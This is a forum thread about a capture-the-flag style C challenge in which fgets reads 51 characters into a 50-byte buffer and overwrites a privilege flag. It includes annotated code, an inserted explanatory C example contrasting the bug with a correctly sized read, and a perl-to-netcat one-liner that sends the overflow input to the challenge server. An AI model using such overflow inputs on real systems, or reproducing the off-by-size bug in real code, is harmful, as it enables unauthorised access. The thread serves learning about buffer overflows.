Do you know exploit on this code ??

Post by Backbite on Tue Feb 02, 2016 9:26 pm

Code:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#ifdef _WIN32
#include <conio.h>            /* getch() comes from here on Windows (Dev C++) */
#else
#define getch() getchar()     /* portable stand-in on Linux; assumed, not in the post */
#endif

/* secret() is called but never shown in the post; placeholder body, assumed */
static void secret(void){
        puts("secret() reached");
}

int main(){
        char name[50];        /* 50-byte buffer */
        int priv = 0;         /* flag that the overflow is meant to flip */
        puts("Pwn me if you can!!\n");
        fgets(name,52, stdin);  /* reads up to 51 chars + NUL: 2 bytes past name[] (intended bug) */
        puts(name);             /* the post had puts(stdin), which passes a FILE* to puts; corrected */
        if (priv){
                secret();
                getch();
        }
        else
                getch();
}
Last edited by Backbite on Wed Feb 10, 2016 9:15 pm, edited 1 time in total.


Re: Do you know exploit on this code ??

Post by boriz666 on Wed Feb 03, 2016 5:32 am

Greetings,
a one-liner to exploit this, if you have perl installed (most distros have):
perl -e 'print "1" x 53' | nc lxc.rop.sh 2026

Cheers!


Re: Do you know exploit on this code ??

Post by -Ninjex- on Wed Feb 03, 2016 9:44 pm

The reason this works is because the fgets function is reserving 52 bytes. If you go over the allocated bytes, it begins to "overflow" that data elsewhere. It will overwrite the priv variable, setting the value to true, which then executes the secret(); and getch(); functions. The challenge seems easier than it should be, but maybe that's the point...

You could just normally nc into the machine and type anything in over 52 characters long to win. Perl was just a shorthand way of echoing 53 bytes to STDOUT and then the data was piped to the challenge server.
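To make the overwrite -Ninjex- describes concrete, here is an added example (not code from the thread or the challenge): it models the post's frame as a 50-byte name[] followed directly by a 4-byte priv, packed into raw bytes so the result is deterministic (a real compiler may pad or reorder locals, which is an assumption this model sidesteps), emulates fgets(name, 52, stdin) against fgets(name, sizeof name, stdin), and returns the resulting priv so the vulnerable and hardened calls can be compared.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Constructed model of the post's locals: name[50] immediately followed by
   priv (int32). The real stack layout is compiler-dependent; this is assumed. */
#define NAME_LEN 50
#define PRIV_OFF NAME_LEN
#define FRAME_LEN (NAME_LEN + sizeof(int32_t))

struct frame { unsigned char bytes[FRAME_LEN]; };

/* Emulates fgets(name, limit, stdin): at most limit-1 chars are stored, then a NUL.
   Returns priv afterwards; non-zero means the flag was clobbered by the input. */
static int32_t read_name(struct frame *f, size_t limit, const char *input) {
    memset(f->bytes, 0, FRAME_LEN);             /* priv = 0, as in the post */
    size_t n = strlen(input);
    if (n > limit - 1) n = limit - 1;           /* fgets' own bound */
    memcpy(f->bytes, input, n);                 /* limit > NAME_LEN: bytes land in priv */
    f->bytes[n] = '\0';
    int32_t priv;
    memcpy(&priv, f->bytes + PRIV_OFF, sizeof priv);
    return priv;
}

/* The post's call: fgets(name, 52, stdin) on a 50-byte buffer. */
static int32_t vulnerable(const char *input) {
    struct frame f;
    return read_name(&f, 52, input);
}

/* Hardened call: the size argument is the buffer's real size, so priv is never reached. */
static int32_t hardened(const char *input) {
    struct frame f;
    return read_name(&f, sizeof(char[NAME_LEN]), input);
}

int main(void) {
    char payload[54];                           /* same bytes as perl -e 'print "1" x 53' */
    memset(payload, '1', 53);
    payload[53] = '\0';
    printf("fgets(name, 52):          priv = %d\n", (int)vulnerable(payload));
    printf("fgets(name, sizeof name): priv = %d\n", (int)hardened(payload));
    return 0;
}
```

A short name such as "bob" leaves priv at 0 in both versions; only the oversized size argument lets the 53-byte input reach the flag.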


Re: Do you know exploit on this code ??

Post by Backbite on Fri Feb 05, 2016 3:22 am

boriz666 wrote:Greetings,
a one-liner to exploit this, if you have perl installed (most distros have):
perl -e 'print "1" x 53' | nc lxc.rop.sh 2026

Cheers!


:o Perl lang
I wanna know, what is "nc" after the pipe sign?


Re: Do you know exploit on this code ??

Post by Backbite on Fri Feb 05, 2016 3:22 am

-Ninjex- wrote:The reason this works is because the fgets function is reserving 52 bytes. If you go over the allocated bytes, it begins to "overflow" that data elsewhere. It will overwrite the priv variable, setting the value to true, which then executes the secret(); and getch(); functions. The challenge seems easier than it should be, but maybe that's the point...

You could just normally nc into the machine and type anything in over 52 characters long to win. Perl was just a shorthand way of echoing 53 bytes to STDOUT and then the data was piped to the challenge server.



I understand your post, but I don't know about the solution & nc, and how do I input a value to stdin? (I'm a Windows user; my editor is Dev C++ :cry: )


Thank you for replying.
Regards, Backbite
Last edited by Backbite on Fri Feb 05, 2016 3:39 am, edited 2 times in total.


Re: Do you know exploit on this code ??

Post by cyberdrain on Mon Feb 08, 2016 6:57 pm

Backbite wrote:I understand your post, but I don't know about the solution & nc, and how do I input a value to stdin? (I'm a Windows user; my editor is Dev C++

nc is netcat and perl is required for that solution. Echo is usually used to create data, but idk if Windows allows bytes to be sent that way. Using type on a file with stored bytes, created using a hex-editor, will send them to the CLI. From there you could try to pipe them into the program. I've never tried this, but it might work. You might need Linux to easily exploit it or create some code that will do it for you on Windows.


Re: Do you know exploit on this code ??

Post by Backbite on Wed Feb 10, 2016 5:37 am

cyberdrain wrote:
Backbite wrote:I understand your post, but I don't know about the solution & nc, and how do I input a value to stdin? (I'm a Windows user; my editor is Dev C++

nc is netcat and perl is required for that solution. Echo is usually used to create data, but idk if Windows allows bytes to be sent that way. Using type on a file with stored bytes, created using a hex-editor, will send them to the CLI. From there you could try to pipe them into the program. I've never tried this, but it might work. You might need Linux to easily exploit it or create some code that will do it for you on Windows.


No problem for a Windows user, I once tried Perl on Windows.

But one last question: what is CLI?

Thank you so much.
Regards, Backbite


Re: Do you know exploit on this code ??

Post by -Ninjex- on Wed Feb 10, 2016 10:15 am

Backbite wrote:But one last question: what is CLI?


CLI is an acronym for Command Line Interface. It's some application which takes input only via text/mouse. In other words, you don't have buttons and other fancy stuff. We refer to the fancy things as GUIs or Graphical User Interfaces. An example of a CLI program is a terminal. An example of a GUI program would be Firefox/Google Chrome.


Re: Do you know exploit on this code ??

Post by cyberdrain on Wed Feb 10, 2016 8:40 pm

-Ninjex- wrote:CLI is an acronym for Command Line Interface. It's some application which takes input only via text/mouse. In other words, you don't have buttons and other fancy stuff. We refer to the fancy things as GUIs or Graphical User Interfaces. An example of a CLI program is a terminal. An example of a GUI program would be Firefox/Google Chrome.

Adding to that: press the Windows key, type in cmd and run that. You'll see the (emulated) command line Windows can use. Type in help, press Enter and you'll see the list of available commands. You'll probably need some experience with command line interfaces if you're learning exploitation and Linux if you're serious about it.


Re: Do you know exploit on this code ??

Post by Backbite on Wed Feb 10, 2016 9:23 pm

-Ninjex- wrote:
Backbite wrote:But one last question: what is CLI?


CLI is an acronym for Command Line Interface. It's some application which takes input only via text/mouse. In other words, you don't have buttons and other fancy stuff. We refer to the fancy things as GUIs or Graphical User Interfaces. An example of a CLI program is a terminal. An example of a GUI program would be Firefox/Google Chrome.


I just know the abbreviation "CLI" is Command Line Interface :D

Adding to that: press the Windows key, type in cmd and run that. You'll see the (emulated) command line Windows can use. Type in help, press Enter and you'll see the list of available commands. You'll probably need some experience with command line interfaces if you're learning exploitation and Linux if you're serious about it.


I know cmd in Windows, but I never knew it was called CLI.

Thank you both for replying, I got new experience and feel so happy on this forum. :) :)
Regards, Backbite

